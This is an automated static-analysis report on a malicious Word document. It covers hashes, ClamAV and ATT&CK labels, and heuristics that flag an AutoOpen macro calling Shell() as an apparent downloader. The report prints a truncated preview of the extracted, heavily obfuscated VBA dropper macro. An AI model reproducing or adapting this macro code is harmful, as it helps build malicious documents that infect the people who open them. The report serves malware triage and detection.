Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ced0b93ab8cced7b…

MALICIOUS

Office (OLE)

158.0 KB Created: 2018-02-27 13:33:00 Authoring application: Microsoft Office Word First seen: 2019-05-16
MD5: 4841f25172373a2a0a0ac501fef20c42 SHA-1: 195f185fbee91b028e0d1a86cee8933c41f83973 SHA-256: ced0b93ab8cced7b438bca6630193ecbc0667d93a2e953679eba29c5dd731a83
204 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro utilizes a Shell() call, indicating an attempt to execute arbitrary code. The presence of the 'AutoOpen' macro and the ClamAV detection signature 'Doc.Dropper.Agent-6458239-0' strongly suggest this document is a dropper designed to download and execute a secondary payload. No specific family could be identified due to obfuscation.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6458239-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6458239-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 52700 bytes
SHA-256: a0d9fcc766ad49cfd59dc1df282fdf745f29040dd92bf71b7eb581e3720287dd
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 20 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "ECwhVJPZLdWr"
Sub ZrjYj()
   On Error Resume Next
   Do While wiibwIThzE Xor tzAsNwVaFM
      Dim LcAfUprH
      Do While iZFFBab Or YCbRV
         kXrIMuOzbRiW = 6025 - Atn(aRodq / CByte(7) + ssTuurmUTCDkz + Hex(rQHchfMzkwnXi)) + (171376742 / AkkYladsQ) * (5938624 * ChrW(520437311) + wQZauvXjjj * KKLwLdu)
      Loop
      UGXMOU = 6025 - Atn(RizYMwzdjQF / CByte(7) + DoaGowNqZYba + Hex(jlwWYELFKdthKT)) + (171376742 / LjfjFrq) * (5938624 * ChrW(520437311) + tzjOAiJt * ZbdNC)
      Do
         HMujsL = ZdfBittvUFs * CDate(426718607 * Atn(CWpqLbBk - Fix(HjpzIZXULKzIM * CDate(8832))) * GizzQAHEWk / CLng(5390)) / 9 - ChrB(8 - Cos(911)) / 83 + Int(AkRViFraqRuqBW) / VaIuvJpw - ChrB(872) / HMclkiDMEEH + Chr(778 / Atn(48 * Round(FwcFFhVILrzd / CBool(2)))) / (1199 / CByte(ihwbplKniOWdGq * 8 + OhlzOi * CDbl(39)))
      Loop Until bfppcUnX <= OwoFBGkP
      zCXkGbzr = uiGzORO + QmzIqz
   Loop
   Set wHiSkGH = WiQcsrZNqlGttJ
End Sub
Function MRzCmzhWsHPu()
On Error Resume Next
QKJpJw = "rMikSIzKvu% tes&&wo=%2rav%iVijMPwvBkRZpizw"
krBWdP = jAMIMPLpa = 6025 - Atn(vnbDWAzIuv / CByte(7) + VDbDXdFM + Hex(cUvdiEFfPSjk)) + (171376742 / ocOuw) * (5938624 * ChrW(520437311) + PrYMZ * LzkEo)
nlcnoHKNzzw = FdqAbrwVRuTt = 6025 - Atn(OiSOzocjEw / CByte(7) + DHVaWHVabjbHM + Hex(AWwbjUYflKTt)) + (171376742 / kQLFAjzzTVX) * (5938624 * ChrW(520437311) + KZsSunbFbwSjFU * UYWLHdZkKP)
XJdLij = iuivbdfghnkjgyugjn(QKJpJw, 17, 17)
ijkHl = "sclkN tes&&qzMRWicctWksHBSaiqiSutXwuGQYnhKHlr"
YPiiCWtquvL = XlYnOSXzj = 6025 - Atn(rURqSjEU / CByte(7) + bzUGarzGcZt + Hex(dfMEIzzDRSJbVO)) + (171376742 / uisJsBnFaC) * (5938624 * ChrW(520437311) + zvOLvZnVOpE * JiFRPIntkMOF)
lmohHdSwI = jPAvpamBd = 6025 - Atn(DoGXj / CByte(7) + AAnpwibnjXzn + Hex(vkjJnL)) + (171376742 / mZYPSk) * (5938624 * ChrW(520437311) + iBcJlEFkLbP * AoNLRczshP)
PpZUQBcZZuw = iuivbdfghnkjgyugjn(ijkHl, 35, 6)
dRJKKUKjLO = "BcvrrivsXDJIYv%!!%8rav%MNawJk"
nrcYolVz = TCYIJ = 6025 - Atn(lEBBoCBtL / CByte(7) + wJCVDEccL + Hex(iZZZzOQ)) + (171376742 / zwXTvjiLmVBP) * (5938624 * ChrW(520437311) + PpjhDTQAOaw * wpMicEalMvOAdN)
ojpLzcvUSl = qrRHbvdSj = 6025 - Atn(rtvzoiWbWzrSj / CByte(7) + QbdXTaf + Hex(pzaIz)) + (171376742 / VBSWckkK) * (5938624 * ChrW(520437311) + mYMsZHOdYK * qzRGzJ)
OVUivZiNRZ = iuivbdfghnkjgyugjn(dRJKKUKjLO, 7, 10)
nCljSJLSO = "WMHZzzOJvV6raSXDtMiZfBOJiwSfcAZdH"
ksobRw = ftmJsL = 6025 - Atn(jJqSJEir / CByte(7) + DcCpMjL + Hex(COJNpBknvCM)) + (171376742 / WikSEzllSbO) * (5938624 * ChrW(520437311) + iMaXMosz * EHiBFtHFiNC)
CZKumzI = IqVrklOu = 6025 - Atn(PazqicbNa / CByte(7) + JNASbG + Hex(wDdjnNMB)) + (171376742 / WFfcDiEHo) * (5938624 * ChrW(520437311) + iLXRjrDGsEH * tlTmKRtcN)
pcUbJQq = iuivbdfghnkjgyugjn(nCljSJLSO, 21, 3)
RacFA = "tKtDZAFmsAhTVoHTEzS=%wJZnficvYuTGUVUJmAYIm"
kOAQqJVln = GvSJTNYiMBCUO = 6025 - Atn(CajbVXju / CByte(7) + jZNzNswEuDzjPD + Hex(zOMDEZjKQ)) + (171376742 / EaQctNMLzijFN) * (5938624 * ChrW(520437311) + lOzHRQj * WOcGKcqWzOzK)
VVfYc = SibBpl = 6025 - Atn(QUltABSp / CByte(7) + btzGRDCAmC + Hex(VdiUIDBTjVG)) + (171376742 / fOVBciGIKA) * (5938624 * ChrW(520437311) + YVzDrOjbOmCwm * QlwAwJHVQUsw)
JdXALSwQ = iuivbdfghnkjgyugjn(RacFA, 8, 17)
GSUBP = "YXYKnBmOaav% oz"
ZOmQWC = PstkJwwmfotWN = 6025 - Atn(ShZYdmih / CByte(7) + rpLISwFTY + Hex(GaAPdUisqhwVz)) + (171376742 / RszYiQ) * (5938624 * ChrW(520437311) + HhSCuzojoaUVcG * RSwEwtrAbWrBq)
OljlQ = BhkIzwsiN = 6025 - Atn(XqMCHdzVDZa / CByte(7) + biRBPhrfCw + Hex(HmtjNdIAjENjHh)) + (171376742 / tzXWwRwWFGqzj) * (5938624 * ChrW(520437311) + qhjbsEP * umruYra)
SdvnmkEb = iuivbdfghnkjgyugjn(GSUBP, 3, 4)
WhBFznJ = "qafijtjS&&!%2rav%!=%ZZYIWauNj"
UHWmbl = PSvwh = 6025 - Atn(CjcEmUShII / CByte(7) + KQnmKMGBziXud + Hex(vaLGQCEzPr)) + (171376742 / XEDDiMf) * (5938624 * ChrW(520437311
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.